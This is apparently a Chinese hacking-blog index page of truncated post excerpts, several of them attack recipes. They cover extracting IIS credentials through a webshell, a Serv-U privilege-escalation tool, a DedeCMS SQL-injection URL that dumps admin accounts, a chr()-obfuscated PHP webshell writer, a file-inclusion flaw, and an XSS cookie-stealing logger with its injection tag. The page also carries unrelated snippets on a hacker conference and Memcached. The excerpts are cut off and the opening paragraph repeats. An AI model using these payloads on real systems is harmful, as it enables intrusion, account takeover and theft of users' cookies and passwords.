使用Adsutil.vbs脚本获取IIS配置信息及账号密码
今晚在搞https://www.webshell.cc/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就...
今晚在搞https://www.webshell.cc/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就...
HWay && Serv-U.php 利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能. 如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击"获取Ser...
搜索关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%...
简要描述: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马 防黑网。 详细说明: <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr...
直接看代码: js/calendar.php $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname...
好吧之前就把google发在了90sec 跟t00ls了!不过过了一会黑阔们就去扫描我shell地址了! 额滴神啊,速度太快了!!没办法马上赶写了一个批量修改文件名称的把shell全部移动了地方修改了文件名! 最后再把漏洞文件给那个啥了!不过一看黑阔们又挖出shell地址出来了!! 好吧不跟你们耗了。想想还是把代码发出来吧!! 这个是百度批量的。自己保存为xx.php <?php print...
很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下 asp.asp或者php.php 或者cookies.htm效果如下 保存文本 发送邮件 获取的cookies 截获用户名密码 主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱 内容如下:使用方法: asp.asp是Asp中调用Get.asp的例子内容...
cook.php <? $info = $_SERVER['QUSEY_STRING']; if ($info) { $fp = fopen("info.txt"."a"); fwrite($fp.$info."\n"); fclose($fp); } ?> 使用代码: 插入: <img name="ak" width=0 height=0 border=0>...
一年一度的“世界黑客大会”不久前在拉斯维加斯闭幕。从如何运用漏洞入侵西门子公司的“S7”自动控制系统,到如何自制可无线遥控的间谍飞机,林林总总,无奇不有。和往年稍有不同的是,美国几乎所有与国家安全相关的政府部门,都派员参加了此次大会。 据说国土安全部赶来是避免与会的黑客“一时兴起”,说得太多,教会恐怖分子如何利用网络漏洞入侵美国关键基础设施;联邦调查局是借机发现线索和打击黑客犯罪,锁定网络犯罪嫌疑...
朋友公司开发的项目要用到缓存,于是叫我推荐一个,我说我们公司在用Memcached,然后就问了我一堆关于Memcached的问题,直接把我问的无言了,因为虽然项目用到了,但是我自己却没搞过这个,只是知道有这么个东西存在,唉… 准备工作: 1.从http://splinedancer.com/memcached-win32/下载Memcached for Windows。解压至任意目录(如C:\me...